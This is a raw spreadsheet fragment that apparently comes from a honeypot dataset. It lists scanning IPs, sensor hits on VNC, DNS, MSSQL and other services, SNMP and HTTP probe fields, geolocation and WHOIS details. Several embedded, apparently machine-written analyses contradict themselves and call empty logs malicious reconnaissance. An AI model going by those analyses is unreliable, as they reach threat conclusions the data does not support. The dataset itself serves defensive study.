'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}</t>
  </si>
  <si>
    <t>::ffff:68ea:736a</t>
  </si>
  <si>
    <t>This suggests an attempted connection to a secure service, but the activity was likely a reconnaissance scan or a probe to identify vulnerabilities, as no actual data transfer occurred. The lack of data transfer indicates it may be a port scan or probing activity. This behavior is indicative of potential malicious exploration. &amp;&amp; The data indicates that there is no SOCKS proxy activity detected, suggesting that an attacker may have attempted to use this proxy method for malicious purposes but was unsuccessful or undetected. This could be a sign of a potential attack attempt via a SOCKS proxy connection. No SOCKS5 proxy activity was observed. &amp;&amp; This log indicates potential malicious activity as an unknown IP attempted to connect using SOCKS5, which is often used for tunneling. This could be an attempt to bypass security measures or hide the true source of the traffic. No further information is available on the IP's intentions. &amp;&amp; No SNMP activity detected, likely an attempted scan or reconnaissance of network services. The absence of SNMP data suggests the attacker is trying to gather information about available services. This could be a precursor to potential exploitation. &amp;&amp; This suggests an unauthorized access attempt using default community string "public" to read system information. The attacker is likely scanning for network topology or system details. This could be a reconnaissance activity by a potential threat actor. &amp;&amp; Malicious activity detected, potential unauthorized access to system configuration information via a public community string. Publicly accessible management interface is being queried for system details. This could be a reconnaissance attempt by an attacker. &amp;&amp; No log data provided.</t>
  </si>
  <si>
    <t>Unknown Attack</t>
  </si>
  <si>
    <t>3c9936c05b107665a6f748b6d70919b6</t>
  </si>
  <si>
    <t>172.81.62.89</t>
  </si>
  <si>
    <t>unassigned.172-81-62-89.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_VNC_H33</t>
  </si>
  <si>
    <t>5900&amp;&amp;53&amp;&amp;65083&amp;&amp;55239&amp;&amp;51913&amp;&amp;52018&amp;&amp;53340&amp;&amp;52790&amp;&amp;50588&amp;&amp;50490&amp;&amp;59977&amp;&amp;50949&amp;&amp;51134&amp;&amp;65216</t>
  </si>
  <si>
    <t>::ffff:ac51:3e59</t>
  </si>
  <si>
    <t>56dc90c989a36c25589e7b7699bf3d4c</t>
  </si>
  <si>
    <t>117.255.29.33</t>
  </si>
  <si>
    <t>::ffff:75ff:1d21</t>
  </si>
  <si>
    <t>90bb8fc076dd460e3ca4c713a9d40314</t>
  </si>
  <si>
    <t>121.152.162.217</t>
  </si>
  <si>
    <t>2006-04-07</t>
  </si>
  <si>
    <t>::ffff:7998:a2d9</t>
  </si>
  <si>
    <t>d92fa39b69a0d85f6c4fecdf3464643e</t>
  </si>
  <si>
    <t>142.202.189.39</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.142-202-189-39.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MT-CPA_H8</t>
  </si>
  <si>
    <t>5900&amp;&amp;64216&amp;&amp;64117&amp;&amp;57947&amp;&amp;57709&amp;&amp;54381&amp;&amp;65329&amp;&amp;50770&amp;&amp;49306&amp;&amp;50375&amp;&amp;49889&amp;&amp;62658&amp;&amp;51002&amp;&amp;64897&amp;&amp;58846&amp;&amp;55011&amp;&amp;51070&amp;&amp;65425&amp;&amp;58877&amp;&amp;56869</t>
  </si>
  <si>
    <t>2019-12-18</t>
  </si>
  <si>
    <t>2022-07-15 16:05:05</t>
  </si>
  <si>
    <t>2030-07-15 16:05:05</t>
  </si>
  <si>
    <t>2025-01-12 12:07:03</t>
  </si>
  <si>
    <t>['NS1.DYNU.COM', 'NS2.DYNU.COM', 'NS3.DYNU.COM', 'NS4.DYNU.COM', 'NS5.DYNU.COM', 'NS6.DYNU.COM']</t>
  </si>
  <si>
    <t>['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited']</t>
  </si>
  <si>
    <t>abuse@dynu.com</t>
  </si>
  <si>
    <t>::ffff:8eca:bd27</t>
  </si>
  <si>
    <t>8f5be7df8ef77da9e901da9d9f31ba6f</t>
  </si>
  <si>
    <t>142.202.189.62</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.142-202-189-62.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H39</t>
  </si>
  <si>
    <t>5900&amp;&amp;57592&amp;&amp;62082&amp;&amp;50909&amp;&amp;65427&amp;&amp;59810&amp;&amp;59639&amp;&amp;53762</t>
  </si>
  <si>
    <t>::ffff:8eca:bd3e</t>
  </si>
  <si>
    <t>9b33bc087ba5ba126edc76c403cbe8b8</t>
  </si>
  <si>
    <t>142.202.189.44</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.142-202-189-44.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_MT-CPA_H11</t>
  </si>
  <si>
    <t>5900&amp;&amp;63256&amp;&amp;50983&amp;&amp;50404&amp;&amp;53170&amp;&amp;55661&amp;&amp;59599&amp;&amp;58859&amp;&amp;64897&amp;&amp;58626&amp;&amp;52804&amp;&amp;64178</t>
  </si>
  <si>
    <t>::ffff:8eca:bd2c</t>
  </si>
  <si>
    <t>654910fd3882514e5b17434fd9eb2be7</t>
  </si>
  <si>
    <t>142.202.189.12</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.142-202-189-12.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H37</t>
  </si>
  <si>
    <t>5900&amp;&amp;59047&amp;&amp;56387&amp;&amp;52104&amp;&amp;59812&amp;&amp;58244&amp;&amp;64273&amp;&amp;62645&amp;&amp;60959</t>
  </si>
  <si>
    <t>::ffff:8eca:bd0c</t>
  </si>
  <si>
    <t>4ca2bcb79f882d8f4540363099e4f829</t>
  </si>
  <si>
    <t>171.229.165.169</t>
  </si>
  <si>
    <t>::ffff:abe5:a5a9</t>
  </si>
  <si>
    <t>7ddf18cd7d9ca023e0c99deaf3cdbedc</t>
  </si>
  <si>
    <t>172.81.62.217</t>
  </si>
  <si>
    <t>unassigned.172-81-62-217.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_DHCP_H42&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_DHCP_H3&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_DHCP_H25&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H11</t>
  </si>
  <si>
    <t>5900&amp;&amp;67&amp;&amp;34787&amp;&amp;67&amp;&amp;44658&amp;&amp;67&amp;&amp;56010&amp;&amp;57021&amp;&amp;59901&amp;&amp;60668&amp;&amp;63624&amp;&amp;57231&amp;&amp;52399</t>
  </si>
  <si>
    <t>::ffff:ac51:3ed9</t>
  </si>
  <si>
    <t>3431c68749be6471813bb0185f3364c0</t>
  </si>
  <si>
    <t>172.81.62.117</t>
  </si>
  <si>
    <t>unassigned.172-81-62-117.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_DNS_H32&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_VNC_H30</t>
  </si>
  <si>
    <t>5900&amp;&amp;57434&amp;&amp;53&amp;&amp;61106&amp;&amp;53&amp;&amp;45826&amp;&amp;50861&amp;&amp;54456&amp;&amp;63216&amp;&amp;54344&amp;&amp;50841&amp;&amp;51480&amp;&amp;50240&amp;&amp;64553&amp;&amp;56713&amp;&amp;63580&amp;&amp;62657&amp;&amp;59176&amp;&amp;54828&amp;&amp;50763</t>
  </si>
  <si>
    <t>{'zen.spamhaus.org': ['spam']}</t>
  </si>
  <si>
    <t>::ffff:ac51:3e75</t>
  </si>
  <si>
    <t>18f0dcfc202e7705c510e5bc46f2c81d</t>
  </si>
  <si>
    <t>172.81.62.88</t>
  </si>
  <si>
    <t>unassigned.172-81-62-88.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H3&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_DNS_H42&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H41</t>
  </si>
  <si>
    <t>5900&amp;&amp;53&amp;&amp;8514&amp;&amp;65392&amp;&amp;62099&amp;&amp;53780&amp;&amp;30525&amp;&amp;23265&amp;&amp;18687&amp;&amp;36139</t>
  </si>
  <si>
    <t>::ffff:ac51:3e58</t>
  </si>
  <si>
    <t>67579b066c678092bd9b87c1ca5c1afb</t>
  </si>
  <si>
    <t>61.106.81.10</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_IPP_H44&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_SIP_H13&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;25986&amp;&amp;631&amp;&amp;5900&amp;&amp;1521&amp;&amp;1080&amp;&amp;123&amp;&amp;6379&amp;&amp;5060&amp;&amp;443&amp;&amp;110&amp;&amp;55565&amp;&amp;NA</t>
  </si>
  <si>
    <t>Seoul (Yeonseo-ro)</t>
  </si>
  <si>
    <t>37.6133</t>
  </si>
  <si>
    <t>126.917</t>
  </si>
  <si>
    <t>17839</t>
  </si>
  <si>
    <t>LG HelloVision Corp.</t>
  </si>
  <si>
    <t>CJ Hellovision</t>
  </si>
  <si>
    <t>::ffff:3d6a:510a</t>
  </si>
  <si>
    <t>No data provided, cannot analyze.</t>
  </si>
  <si>
    <t>a5fc8ede4211f5c3a6841214cea1a68a</t>
  </si>
  <si>
    <t>187.103.8.155</t>
  </si>
  <si>
    <t>Jacobina Municipality</t>
  </si>
  <si>
    <t>Jacobina</t>
  </si>
  <si>
    <t>3460344</t>
  </si>
  <si>
    <t>-11.1814</t>
  </si>
  <si>
    <t>-40.5137</t>
  </si>
  <si>
    <t>53098</t>
  </si>
  <si>
    <t>NEWNET CONSULTORIA, INFORMATICA LTDA</t>
  </si>
  <si>
    <t>::ffff:bb67:89b</t>
  </si>
  <si>
    <t>There is insufficient information to analyze, as there is no log data provided.</t>
  </si>
  <si>
    <t>I need log data to analyze the attacks. Please provide the log data, and I'll be happy to help you identify the types of attacks.</t>
  </si>
  <si>
    <t>e0e6e7058943323627379f87b9f0b88b</t>
  </si>
  <si>
    <t>186.249.185.168</t>
  </si>
  <si>
    <t>Maracanaú Municipality</t>
  </si>
  <si>
    <t>Maracanaú</t>
  </si>
  <si>
    <t>3395473</t>
  </si>
  <si>
    <t>-3.87667</t>
  </si>
  <si>
    <t>-38.6256</t>
  </si>
  <si>
    <t>262532</t>
  </si>
  <si>
    <t>VAS Freitas Servicos de Internet Ltda</t>
  </si>
  <si>
    <t>NET ONDA SERVICOS DE INTERNET LTDA</t>
  </si>
  <si>
    <t>Neuma Rodrigues Santos</t>
  </si>
  <si>
    <t>::ffff:baf9:b9a8</t>
  </si>
  <si>
    <t>b8af981f60defaa4e21f4c44534ceaa0</t>
  </si>
  <si>
    <t>115.242.159.182</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>33690&amp;&amp;1433</t>
  </si>
  <si>
    <t>None&amp;&amp;connection&amp;&amp;login</t>
  </si>
  <si>
    <t>::ffff:73f2:9fb6</t>
  </si>
  <si>
    <t>f6823443442cb3608add0727591e8bd4</t>
  </si>
  <si>
    <t>103.228.78.151</t>
  </si>
  <si>
    <t>{'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>Rajkot</t>
  </si>
  <si>
    <t>Rajkot (Jagnath Plot)</t>
  </si>
  <si>
    <t>1258847</t>
  </si>
  <si>
    <t>360004</t>
  </si>
  <si>
    <t>22.2934</t>
  </si>
  <si>
    <t>70.7906</t>
  </si>
  <si>
    <t>INPL's</t>
  </si>
  <si>
    <t>Ishan Netsol Pvt Ltd</t>
  </si>
  <si>
    <t>2014-03-24</t>
  </si>
  <si>
    <t>::ffff:67e4:4e97</t>
  </si>
  <si>
    <t>cea9d121623506d5d931dd1ca1634993</t>
  </si>
  <si>
    <t>142.202.189.49</t>
  </si>
  <si>
    <t>unassigned.142-202-189-49.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_DNS_H22&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_VNC_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;35503&amp;&amp;49200&amp;&amp;54304&amp;&amp;53026&amp;&amp;49175&amp;&amp;62945&amp;&amp;61952&amp;&amp;57867&amp;&amp;62873&amp;&amp;60560</t>
  </si>
  <si>
    <t>::ffff:8eca:bd31</t>
  </si>
  <si>
    <t>5b4f8807f8603136cbd42959662abb2f</t>
  </si>
  <si>
    <t>162.216.243.239</t>
  </si>
  <si>
    <t>unassigned.162-216-243-239.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_DNS_H15&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H7</t